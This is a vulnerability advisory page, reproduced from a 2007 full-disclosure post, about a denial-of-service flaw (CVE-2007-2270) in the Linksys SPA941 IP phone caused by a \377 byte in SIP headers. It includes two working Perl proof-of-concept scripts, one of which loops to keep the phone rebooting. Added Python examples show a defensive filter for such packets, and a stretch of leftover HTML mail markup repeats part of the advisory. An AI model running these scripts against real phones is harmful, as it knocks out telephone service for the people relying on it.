Category:   Device (VoIP/Phone/FAX)  >   Linksys Router
Vendors:   Linksys
Linksys SPA941 Phone Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1017957
SecurityTracker URL:  http://securitytracker.com/id/1017957
CVE Reference:   CVE-2007-2270
Updated:  May 12 2008
Original Entry Date:  Apr 25 2007
Impact:   Denial of service via network
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): model SPA941, version 5.1.5
Description:   A vulnerability was reported in the Linksys SPA941 phone. A remote user can cause denial of service conditions.

A remote user can send a specially crafted SIP message to cause the target device to reboot. The vulnerability can be triggered with the '\377' character in the SIP field.

The vendor was notified on April 4, 2007.

The Madynes research team at INRIA Lorraine discovered this vulnerability using the Madynes VoIP fuzzer.

Impact:   A remote user can cause the target device to reboot.
Solution:   No solution was available at the time of this entry.

The vendor plans to issue a fix.

Vendor URL:  www.linksys.com/
Cause:   Input validation error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Tue, 24 Apr 2007 14:34:27 +0200
Subject:  [Full-disclosure] Linksys SPA941 remote DOS with \377 character


MADYNES Security Advisory

http://madynes.loria.fr

Title: Linksys SPA941 remote DOS with \377 character

Discovery Date: 01/02/2007
Vendor notification: 4/04/2007 and 17/04/2007
Release Date: 24/04/2007

Severity: Moderate - Denial of Service

Advisory ID: KIHP3

Vulnerability in Linksys SPA941



Synopsis: After sending a crafted SIP message the device immediately
reboots. The phone does not properly check the metacharacter \377 in the
SIP field.

The vendor was informed and future firmware will be available. This
vulnerability was identified by the Madynes research team at INRIA Lorraine,
using the Madynes VoIP fuzzer.

Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol for
VoIP signalization. SIP is ASCII based; an INVITE message is used to initiate
and maintain a communication session.

 


Configuration of our device:

*	Software Version: 5.1.5
*	IP-Address obtained by DHCP as 192.168.1.107
*	User Name: linksys

Vulnerability:

It may reboot and/or reply with invalid messages. The phone is not able to
handle the character \377 (full byte) well in a message. Depending on where
this character is located the phone may reboot (e.g. in any section of the
FROM header). If this character is located anywhere else it may modify the
content of the reply messages generated by the phone, as shown in the
exploit. It looks like a format string vulnerability, but no effort to
investigate firmware was done.



Exploit 1)

In this exploit we set a \377 character before every carriage return. The
replies are modified in their Status line and most of the headers are
erased. Different behavior exists depending on the quantity of \377
characters and their location. Linksys IP Phone SPA941 (firmware 5.1.5)
cannot cope with the \337 characters in the FROM field when the real (IP port
in the IP packet) is different from the IP port in the SIP-FROM field.

Exploit 1)

To run the exploit the file linksys-5.1.5.pl should be launched (assuming
our configurations) as:

perl linksys-5.1.5.pl 192.168.1.107 5060 linksys

POC: 1

 

#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
        Proto=>'udp',
        PeerAddr=>$ARGV[0]);

$msg =
"INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r
Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r
Max-Forwards: 70\377\r
To: lynksys <sip:$ARGV[2]\@$ARGV[0]>\377\r
From: <sip:tucuman\@192.168.1.2>;tag=00\377\r
Call-ID: tucu\@192.168.1.2\377\r
CSeq: 24865 INVITE\377\r
Contact: <sip:tucu\@192.168.1.2>\377\r
Supported: 100rel\377\r
Content-Length: 0\377\r
\r\n";

$socket->send($msg);

 

 

 

 

Exploit 2)

In order to remotely reboot the phone the following POC will work.

If the phone is called with the POC 2 it will ring. When answering it
reboots immediately. If not it will reboot after some time.

The POC will send the killer message every 90 seconds - the time needed for a
reboot - and performs the effective DOS. It also opens a socket on the local
machine to avoid sending RST to the phone. The same can be obtained with a
firewall or a netcat.

POC 2:

Command: perl script.pl <username> <dst_IP> <SourceIp> <sourceport>

            E.g. perl script.pl 101 152.81.114.195 152.81.12.93 5060

Script Code:

 

#!/usr/bin/perl

use IO::Socket;

#die "Usage $0 <username> <dst_IP> <Source_IP> <SourcePort>" unless ($ARGV[2]);
die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>" unless ($ARGV[0]);

my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp');
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');

$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";

$msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377<sip:$fromuserid\@$sourceaddress>;tag=779\r
To: Receiver <sip:$touser\@$target>\r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 <sip:$fromuserid\@$sourceaddress>\r
Expires: 1200\r
Max-Forwards: 70\r
Content-Type: application/sdp\r
Content-Length: 133\r
\r
v=0\r
o=0 0 0 IN IP4 $sourceaddress\r
s=Session SDP\r
c=IN  IP4 $sourceaddress\r
t=0 0\r
m=audio 9876 RTP/AVP 0\r
a=rtpmap:0 PCMU/8000\r";

$sock or die "no socket :$!";
while (1){
            $socket->send($msg);
            sleep 90;
            }

 

 

Impact:

A malicious user can remotely crash and perform a denial of service attack
by sending one crafted SIP message. This is conceptually similar to the
"ping of death".

Resolution:

Fixed software will be available and following recommended best practices
(i.e. segregating VOIP traffic from data) will be protected from malicious
traffic in most situations.

From Linksys response we include the following resolution: This style of
attack, limited to a single end point and executed from behind a secure
firewall, should not affect an entire network and in most cases should
easily be contained by the local network management entity.  Linksys will
directly address this issue with a future release of the phone firmware.

Distribution: The advisory will be posted on the following websites:

madynes.loria.fr

The advisory will be posted to the following mailing lists:

Voipsec: voipsec@voipsa.org
fulldisclosure: full-disclosure@lists.grok.org.uk

Credits:

            Balamurugan Karpagavinayagam (Software engineer)
            Humberto J. Abdelnur (Ph.D Student)
            Radu State (Ph.D)
            Olivier Festor (Ph.D)

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer.

Information about us: Madynes is a research team at INRIA Lorraine working
on VoIP Security assessment, intrusion detection and prevention.
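
Added example, not part of the advisory and not Linksys or Madynes code: with no firmware fix available, a SIP proxy, session border controller or IDS sensor in front of the phones can reject datagrams whose start line or headers carry octets that cannot occur in SIP text. RFC 3261 defines SIP as UTF-8 text and 0xFF (octal \377) never appears in valid UTF-8, so the check below flags it without rejecting legitimate non-ASCII display names. The names `inspect_sip`, `bad_octets`, `Finding`, `verdict` and the sample messages (documentation addresses 192.0.2.x) are constructed for this illustration.

```python
"""Flag SIP datagrams whose start line or headers contain octets that are
not valid UTF-8 text (for example 0xFF, written \\377 in the advisory)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int   # 0 = start line, 1.. = header lines
    field: str     # lower-cased header name, "start-line" or "malformed"
    offset: int    # byte offset of the octet within that line
    octet: int     # offending byte value


def bad_octets(line: bytes) -> list:
    """Return sorted (offset, octet) pairs that cannot occur in header text."""
    out = []
    pos = 0
    while pos < len(line):
        try:
            line[pos:].decode("utf-8")      # strict decode: 0xFE/0xFF always fail
            break
        except UnicodeDecodeError as exc:
            bad = pos + exc.start           # exc.start is relative to the slice
            out.append((bad, line[bad]))
            pos = bad + 1                   # resume after the invalid octet
    # Control characters other than HTAB are not header text either
    # (a bare CR or LF left inside a line after splitting on CRLF lands here).
    out += [(i, b) for i, b in enumerate(line)
            if (b < 0x20 and b != 0x09) or b == 0x7F]
    return sorted(out)


def inspect_sip(datagram: bytes) -> list[Finding]:
    """Inspect start line and headers only; the body (e.g. SDP) is skipped."""
    head, _sep, _body = datagram.partition(b"\r\n\r\n")
    findings = []
    field = "start-line"
    for n, line in enumerate(head.split(b"\r\n")):
        # A line starting with SP/HTAB continues the previous header (folding).
        if n > 0 and line[:1] not in (b" ", b"\t"):
            name, colon, _value = line.partition(b":")
            field = (name.strip().decode("ascii", "replace").lower()
                     if colon else "malformed")
        for offset, octet in bad_octets(line):
            findings.append(Finding(n, field, offset, octet))
    return findings


def verdict(datagram: bytes) -> str:
    """Policy for a filtering element in front of the phones."""
    return "drop" if inspect_sip(datagram) else "pass"


# --- constructed sample input (not captured traffic) -----------------------
LINES = [
    b"INVITE sip:alice@192.0.2.10 SIP/2.0",
    b"Via: SIP/2.0/UDP 192.0.2.20:5060;branch=z9hG4bK0001",
    b"Max-Forwards: 70",
    b"To: <sip:alice@192.0.2.10>",
    b'From: "Zo\xc3\xab" <sip:bob@192.0.2.20>;tag=1',   # valid UTF-8 display name
    b"Call-ID: 1@192.0.2.20",
    b"CSeq: 1 INVITE",
    b"Content-Length: 0",
]
BENIGN = b"\r\n".join(LINES) + b"\r\n\r\n"
# 0xFF at the start of the From value, the placement the advisory ties to reboots.
FF_IN_FROM = BENIGN.replace(b"From: ", b"From: \xff")
# 0xFF before every carriage return, the placement the advisory ties to
# corrupted replies.
FF_EVERY_LINE = b"\r\n".join(l + b"\xff" for l in LINES) + b"\r\n\r\n"

if __name__ == "__main__":
    for label, msg in (("benign", BENIGN),
                       ("0xFF in From", FF_IN_FROM),
                       ("0xFF on every line", FF_EVERY_LINE)):
        print(f"{label}: {verdict(msg)}")
        for f in inspect_sip(msg):
            print(f"  line {f.line_no} ({f.field}) offset {f.offset}: 0x{f.octet:02X}")
```

The per-field findings are also usable as a detection signal: logging the header name and offset lets an analyst tell a fuzzing sweep (many fields) from a targeted From-header message.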

 

 

 


t></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>From:
\377&lt;sip:$fromuserid\@$sourceaddress&gt;;tag=3D779\r<o:p></o:p></span>=
</font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>To: =
Receiver
&lt;sip:$touser\@$target&gt;\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Call-ID:
10\@$sourceaddress\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>CSeq: =
1 $cseq\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DPT-BR style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Contact: 779
&lt;sip:$fromuserid\@$sourceaddress&gt;\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DPT-BR style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Expires: 1200\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Max-Forwards:
70\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Content-Type:
application/sdp\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Content-Length:
133\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>v=3D0\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>o=3D0 =
0 0 IN IP4
$sourceaddress\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>s=3DSession SDP\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>c=3DIN&nbsp; IP4
$sourceaddress\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DPT-BR style=3D'font-size:10.0pt;font-family:"Courier New"'>t=3D0 =
0\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DPT-BR style=3D'font-size:10.0pt;font-family:"Courier =
New"'>m=3Daudio 9876
RTP/AVP 0\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>a=3Drtpmap:0
PCMU/8000\r&quot;;<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>$sock =
or die
&quot;no socket :$!&quot;;<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier New"'>while =
(1){<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
$socket-&gt;send($msg);<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
sleep
90;<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
</span></font><font
size=3D2 face=3D"Courier New"><span lang=3DEN-US =
style=3D'font-size:10.0pt;font-family:
"Courier New"'>}<o:p></o:p></span></font></p>


<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>Impact: <o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>A malicious user can remotely crash and =
perform a
denial of service attack by sending one crafted SIP message. This is
conceptually similar to the &#8220;ping of death&#8221;. =
<o:p></o:p></span></font></p>


<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>Resolution:<o:p></o:p></span></font></p>


<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>Fixed software will be available, and =
networks following
recommended best practices (i.e. segregating VOIP traffic from data) will =
be
protected from malicious traffic in most situations. =
<o:p></o:p></span></font></p>


<p class=3DMsoNormal =
style=3D'text-align:justify;text-autospace:none'><font size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>From the Linksys response
we include the following resolution: This style of attack, limited to a =
single
end point and executed from behind a secure firewall, should not affect =
an
entire network and in most cases should easily be contained by the local
network management entity.&nbsp; Linksys will directly address this =
issue with a
future release of the phone firmware.<o:p></o:p></span></font></p>


<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>Distribution: The advisory will be posted on =
the
following websites:<o:p></o:p></span></font></p>


<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>madynes.loria.fr&nbsp; =
<o:p></o:p></span></font></p>


<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>The advisory will be posted to the following =
mailing
lists<o:p></o:p></span></font></p>


<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:
12.0pt'>Voipsec&nbsp;: <a =
href=3D"mailto:voipsec@voipsa.org">voipsec@voipsa.org</a>.<o:p></o:p></sp=
an></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
style=3D'font-size:
12.0pt'>fulldisclosure: <st1:PersonName =
w:st=3D"on">full-disclosure@lists.grok.org.uk</st1:PersonName><o:p></o:p>=
</span></font></p>


<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>Credits:<o:p></o:p></span></font></p>


<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp; </span></font><span
lang=3DEN-US>Balamurugan Karpagavinayagam (Software =
engineer)</span><span
lang=3DEN-US><o:p></o:p></span></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp; Humberto
J. Abdelnur (Ph.D Student)<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp; <st1:place
w:st=3D"on"><st1:PlaceName w:st=3D"on">Radu</st1:PlaceName> =
<st1:PlaceType w:st=3D"on">State</st1:PlaceType></st1:place>
(Ph.D)<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp; Olivier
Festor (Ph.D)<o:p></o:p></span></font></p>


<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><font =
size=3D3
face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>This
vulnerability was identified by the Madynes research team at INRIA =
Lorraine,
using the Madynes VoIP fuzzer.<o:p></o:p></span></font></p>


<p class=3DMsoNormal style=3D'text-autospace:ideograph-numeric'><b><font =
size=3D2
face=3D"Courier New"><span lang=3DEN-US =
style=3D'font-size:10.0pt;font-family:"Courier New";
font-weight:bold'>Information about us: Madynes is a research team at =
INRIA <st1:place
w:st=3D"on"><st1:State w:st=3D"on">Lorraine</st1:State></st1:place> =
working on VoIP
Security assessment, intrusion detection and =
prevention.<o:p></o:p></span></font></b></p>


</div>

</body>

</html>

------=_NextPart_000_015F_01C7867D.A975EBA0--


--===============1338559389==--
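One way a SIP proxy or IDS sensor in front of the phones could flag the malformed header this advisory describes, shown as an added example that is not part of the original post or of any Linksys code. It assumes SIP header text must be valid UTF-8 (RFC 3261), so an octet such as `\377` (0xFF) can never be legitimate; the function names and the sample datagrams are constructed for illustration.

```python
"""Flag SIP datagrams whose header lines contain octets that cannot be valid text."""

# Constructed sample datagrams (documentation addresses, not captured traffic).
BENIGN = (
    b"INVITE sip:alice@192.0.2.10 SIP/2.0\r\n"
    b"Via: SIP/2.0/UDP 192.0.2.20:5061;branch=z9hG4bK00000\r\n"
    b"From: Caller <sip:1001@192.0.2.20>;tag=779\r\n"
    b"To: Receiver <sip:alice@192.0.2.10>\r\n"
    b"Call-ID: 10@192.0.2.20\r\n"
    b"CSeq: 1 INVITE\r\n"
    b"Content-Length: 0\r\n\r\n"
)
# Same message with the display name replaced by a single 0xFF octet.
MALFORMED = BENIGN.replace(b"From: Caller ", b"From: \xff")


def split_headers(datagram: bytes):
    """Return (start_line, [(name, raw_value), ...]) without decoding any value."""
    head, _, _body = datagram.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        if line[:1] in (b" ", b"\t") and headers:  # folded continuation line
            name, value = headers[-1]
            headers[-1] = (name, value + b" " + line.strip())
            continue
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name.strip(), value.strip()))
        else:  # no colon at all: keep the raw line so it is still inspected
            headers.append((b"<malformed>", line))
    return lines[0], headers


def check_datagram(datagram: bytes):
    """Return a list of (header_name, byte_offset, octet) findings; empty if clean."""
    findings = []
    start_line, headers = split_headers(datagram)
    for name, value in [(b"<start-line>", start_line)] + headers:
        label = name.decode("ascii", "replace")
        try:
            value.decode("utf-8")  # 0xFF and other invalid sequences fail here
        except UnicodeDecodeError as exc:
            findings.append((label, exc.start, value[exc.start]))
            continue
        for offset, octet in enumerate(value):
            # Control characters other than TAB do not belong in header text.
            if (octet < 0x20 and octet != 0x09) or octet == 0x7F:
                findings.append((label, offset, octet))
    return findings
```

A sensor would drop or log any datagram for which `check_datagram` returns a non-empty list before it reaches the phone.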

 
 

